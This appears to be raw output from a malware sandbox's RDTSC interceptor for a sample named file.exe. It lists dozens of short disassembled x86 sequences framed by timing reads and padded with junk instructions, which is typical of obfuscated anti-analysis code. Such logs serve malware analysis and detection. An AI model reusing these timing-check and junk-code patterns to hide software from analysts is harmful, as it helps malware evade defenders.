Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80F3BE second address: 80F3CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FAA34ECFF5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0FFD second address: 7A1035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FAA34DB19BBh 0x0000000c pop ebx 0x0000000d jmp 00007FAA34DB19C9h 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007FAA34DB19B6h 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 815978 second address: 815981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 815981 second address: 815986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81511A second address: 815120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 815120 second address: 815126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 815126 second address: 81514A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 jl 00007FAA34ECFF72h 0x0000000c jmp 00007FAA34ECFF66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81514A second address: 815155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 815155 second address: 81515F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAA34ECFF56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 815568 second address: 81556E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B43B second address: 81B440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B440 second address: 81B446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B446 second address: 81B460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jns 00007FAA34ECFF6Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAA34ECFF5Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B460 second address: 81B477 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAA34DB19B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FAA34DB19B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B477 second address: 81B496 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007FAA34ECFF62h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B690 second address: 81B696 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B696 second address: 81B69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B69C second address: 81B6AF instructions: 0x00000000 rdtsc 0x00000002 je 00007FAA34DB19B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81B6AF second address: 81B6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821909 second address: 821932 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FAA34DB19B6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FAA34DB19C9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821A82 second address: 821A88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821BE5 second address: 821BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821BEB second address: 821C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAA34ECFF68h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821C08 second address: 821C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8288FF second address: 828903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82FB9A second address: 82FBC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FAA34DB19B6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAA34DB19C8h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ACCD5 second address: 7ACCD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82F3A6 second address: 82F3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34DB19C5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82F3C0 second address: 82F3CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FAA34ECFF56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82F3CC second address: 82F3EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007FAA34DB19B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 835056 second address: 83505A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83505A second address: 83505E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83505E second address: 83506E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FAA34ECFF56h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 835241 second address: 835250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19BAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 835D2B second address: 835D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 835D31 second address: 835D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 835EB1 second address: 835ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAA34ECFF60h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 835ECB second address: 835ED3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 835ED3 second address: 835ED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 835ED8 second address: 835EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 835EE6 second address: 835EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAA34ECFF56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D745B second address: 7D7460 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 836338 second address: 836342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAA34ECFF56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 836342 second address: 83634E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAA34DB19B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 834BEE second address: 834C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FAA34ECFF63h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 834C0B second address: 834C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FAA34DB19B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 834C16 second address: 834C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A0B4 second address: 83A0C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007FAA34DB19B6h 0x00000009 pop edi 0x0000000a jo 00007FAA34DB19D1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1A9E second address: 7F1AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1AA4 second address: 7F1B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FAA34DB19B8h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FAA34DB19C1h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FAA34DB19B8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d movzx edi, cx 0x00000030 lea eax, dword ptr [ebp+12487853h] 0x00000036 jmp 00007FAA34DB19BCh 0x0000003b nop 0x0000003c jmp 00007FAA34DB19C1h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jns 00007FAA34DB19B6h 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2059 second address: 7F205D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F20DD second address: 7F2109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edi 0x0000000a popad 0x0000000b xor dword ptr [esp], 64979971h 0x00000012 pushad 0x00000013 mov dx, B6A6h 0x00000017 mov dword ptr [ebp+122D26F3h], esi 0x0000001d popad 0x0000001e push F8DC9CA0h 0x00000023 push ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007FAA34DB19B6h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F21A9 second address: 7F21B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAA34ECFF56h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F24AE second address: 7F24B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F24B2 second address: 7F24B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F24B6 second address: 7F24BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F24BC second address: 7F24C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F24C1 second address: 7F2514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FAA34DB19B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007FAA34DB19B8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 mov di, 458Dh 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 ja 00007FAA34DB19B8h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2514 second address: 7F251A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F251A second address: 7F251E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2BA1 second address: 7F2BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FAA34ECFF5Fh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FAA34ECFF5Ah 0x00000015 mov eax, dword ptr [eax] 0x00000017 push ecx 0x00000018 pushad 0x00000019 jg 00007FAA34ECFF56h 0x0000001f jnl 00007FAA34ECFF56h 0x00000025 popad 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jno 00007FAA34ECFF56h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2C99 second address: 7F2CA3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAA34DB19B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2CA3 second address: 7F2CC9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007FAA34ECFF56h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAA34ECFF67h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2CC9 second address: 7D745B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jg 00007FAA34DB19C3h 0x00000010 lea eax, dword ptr [ebp+12487897h] 0x00000016 mov ecx, eax 0x00000018 jmp 00007FAA34DB19BBh 0x0000001d nop 0x0000001e jl 00007FAA34DB19BAh 0x00000024 push ebx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pop ebx 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007FAA34DB19C1h 0x0000002f push ecx 0x00000030 jmp 00007FAA34DB19C8h 0x00000035 pop ecx 0x00000036 popad 0x00000037 nop 0x00000038 adc dl, FFFFFFBAh 0x0000003b lea eax, dword ptr [ebp+12487853h] 0x00000041 mov dx, E548h 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 pop edx 0x0000004a pop eax 0x0000004b push ebx 0x0000004c jng 00007FAA34DB19B6h 0x00000052 pop ebx 0x00000053 popad 0x00000054 mov dword ptr [esp], eax 0x00000057 sub cx, 39F6h 0x0000005c call dword ptr [ebp+122D180Dh] 0x00000062 push eax 0x00000063 push edx 0x00000064 jnl 00007FAA34DB19BCh 0x0000006a jo 00007FAA34DB19B6h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A39F second address: 83A3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jg 00007FAA34ECFF5Eh 0x0000000b jne 00007FAA34ECFF56h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FAA34ECFF60h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A506 second address: 83A513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FAA34DB19B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A513 second address: 83A532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF62h 0x00000007 jns 00007FAA34ECFF56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A7E7 second address: 83A7FF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAA34DB19B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FAA34DB19BBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A7FF second address: 83A80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007FAA34ECFF56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A80D second address: 83A82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAA34DB19C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83AB22 second address: 83AB57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FAA34ECFF5Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAA34ECFF61h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83F03C second address: 83F042 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83F042 second address: 83F05A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAA34ECFF62h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83F05A second address: 83F05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83F05E second address: 83F062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83E921 second address: 83E942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAA34DB19C0h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f ja 00007FAA34DB19B6h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83E942 second address: 83E949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83EA81 second address: 83EA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAA34DB19C7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83EBCD second address: 83EBD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83EBD3 second address: 83EBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83ED43 second address: 83ED60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAA34ECFF56h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FAA34ECFF5Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83ED60 second address: 83ED64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83ED64 second address: 83ED6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83ED6A second address: 83ED74 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAA34DB19C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83ED74 second address: 83ED7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 846C5C second address: 846C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 je 00007FAA34DB19CEh 0x0000000c ja 00007FAA34DB19BAh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 846C75 second address: 846C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 846F50 second address: 846F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAA34DB19B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8473E8 second address: 8473ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8473ED second address: 847417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAA34DB19C6h 0x0000000e jnc 00007FAA34DB19B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F271F second address: 7F2724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2724 second address: 7F272A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
